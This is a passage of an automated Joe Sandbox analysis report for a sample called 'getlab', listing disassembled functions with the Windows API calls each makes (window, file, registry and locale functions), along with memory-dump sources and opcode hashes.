                                                                            • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                          • String ID:
                                                                          • API String ID: 1658689577-0
                                                                          • Opcode ID: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                                          • Instruction ID: bd6209dc85efa73f9a721b4ecfe58d49d0953a842630d38ee12c0cb785ae99e6
                                                                          • Opcode Fuzzy Hash: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                                          • Instruction Fuzzy Hash: 1E314075E0011D9BCB01EF95C8819EEB779EF84314F518577E819BB386E738AE018B98
                                                                          Function 0041FB94 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC31
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoScroll
                                                                          • String ID:
                                                                          • API String ID: 629608716-0
                                                                          • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                          • Instruction ID: d0a12eb0c5d8f31e5c98d8a2781f1eb62c39d12b06d2a108fd5dac4500059ce8
                                                                          • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                          • Instruction Fuzzy Hash: C02130B16087466FC340DF39C5447A6BBE4BB88304F04893EA498C3741E778E996CBD6
                                                                          Function 0046C270 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                            • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                          • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C2CE,?,00000000,?,?,0046C4E0,?,00000000,0046C554), ref: 0046C2B2
                                                                            • Part of subcall function 0041EF50: IsWindow.USER32(?), ref: 0041EF5E
                                                                            • Part of subcall function 0041EF50: EnableWindow.USER32(?,00000001), ref: 0041EF6D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                                          • String ID:
                                                                          • API String ID: 390483697-0
                                                                          • Opcode ID: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                                          • Instruction ID: 435c92a82c98609a262d66890dafa743f24e5c1e823ccadb8e8beb41f7667319
                                                                          • Opcode Fuzzy Hash: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                                          • Instruction Fuzzy Hash: 95F059B1288300BFE7049BF2ECA6B2577E9E318720F510477F904821C0E5B95800C51E
                                                                          Function 0044138C Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction ID: bbd698397dbc8f39e4f55c310c3945233451addb9156919cc96357002ab2f652
                                                                          • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction Fuzzy Hash: 66F06271614109DBBB1CCF58D1519AF7BA0EB44310B20406FF907C7BA0E6346E90DA58
                                                                          Function 00416548 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 0041657D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                          • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                          • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                          • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                          Function 004149AC Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                          • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                          Function 00450798 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                                          • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                          • Opcode Fuzzy Hash: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                                          • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                          Function 0042CCC4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD0C,?,00000001,?,?,00000000,?,0042CD5E,00000000,004529F9,00000000,00452A1A,?,00000000), ref: 0042CCEF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                                          • Instruction ID: 6c88cd9b3502ecc0d8ec22600fa2d9d68314b02b8b7bc0d4dcd5a0b3e687a907
                                                                          • Opcode Fuzzy Hash: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                                          • Instruction Fuzzy Hash: 62E0E570300304BFDB01EB62AC82A5EBFECDB45704BA14876B400A7242D5785E008418
                                                                          Function 0042E8C0 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                                          • Instruction ID: 2ce6c9ff4e19e0960d9753b9113d8e2cc47385edbc752d5ed3014e636873cb34
                                                                          • Opcode Fuzzy Hash: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                                          • Instruction Fuzzy Hash: 90E0D86178831116F23535566C43B77150E4380708F9840277B809E3D3D6AE9905A25E
                                                                          Function 004062E8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,00423674,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 00406311
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                          • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                          Function 0042DDDC Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                                          • Instruction ID: bece317731ff8cd2e666e34543c7a68b5f38d577bb060a1f695f350ce1c31ea4
                                                                          • Opcode Fuzzy Hash: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                                          • Instruction Fuzzy Hash: 46E07EB2610129AFDB40DE8CDC81EEB37ADAB1D350F404016FA08D7200C274EC519BB4
                                                                          Function 00454BCC Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindClose.KERNEL32(00000000,000000FF,0047078C,00000000,00471588,?,00000000,004715D1,?,00000000,0047170A,?,00000000,?,00000000), ref: 00454BE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFind
                                                                          • String ID:
                                                                          • API String ID: 1863332320-0
                                                                          • Opcode ID: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                                          • Instruction ID: 5b38ea55cb3c31d0920dcaeaf3b0ab9c64c5d1fc8265480bc1e0bc694521aac9
                                                                          • Opcode Fuzzy Hash: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                                          • Instruction Fuzzy Hash: C3E092B0A056008BCB14DF3A898031A7AD29FC9324F04C56AEC9CCF3D7E63DC8594A27
                                                                          Function 00414674 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(00494EF2,?,00494F14,?,?,00000000,00494EF2,?,?), ref: 00414693
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                          • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                          • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                          • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                          Function 00406F00 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F14
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                          • Instruction ID: cfde3e3822fa8edba560b3c3045b88a59d445a8db7eea6df610edd37a4bd72e7
                                                                          • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                          • Instruction Fuzzy Hash: A3D012722081516AD220965AAC44EAB6BDCCBC5770F11063AB558C2181D7609C01C675
                                                                          Function 00423644 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004235F0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423605
                                                                          • ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                            • Part of subcall function 00423620: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042363C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 3202724764-0
                                                                          • Opcode ID: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                                          • Instruction ID: ebc5fdb8686796c5fd5eba84b5ab6671b787b6de9fbea9510ee25edb69bb1d0b
                                                                          • Opcode Fuzzy Hash: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                                          • Instruction Fuzzy Hash: 7CD05E123412703182307ABB384598B46AC8D922A6749043BB4448B347ED5DCE1110BC
                                                                          Function 004242BC Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: TextWindow
                                                                          • String ID:
                                                                          • API String ID: 530164218-0
                                                                          • Opcode ID: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                                          • Instruction ID: 82e7bab73c65a9778cea5b734bd50d71f4a8736701fc7bbe01534373bbdf07f9
                                                                          • Opcode Fuzzy Hash: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                                          • Instruction Fuzzy Hash: 0BD05BE27011205BC701BAED54C4AC667CC4B4925671440BBF904EF257D638CD514398
                                                                          Function 00466968 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                          • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                          • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                          • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                          Function 0042CD1C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0045159F,00000000), ref: 0042CD27
                                                                          Memory Dump Source
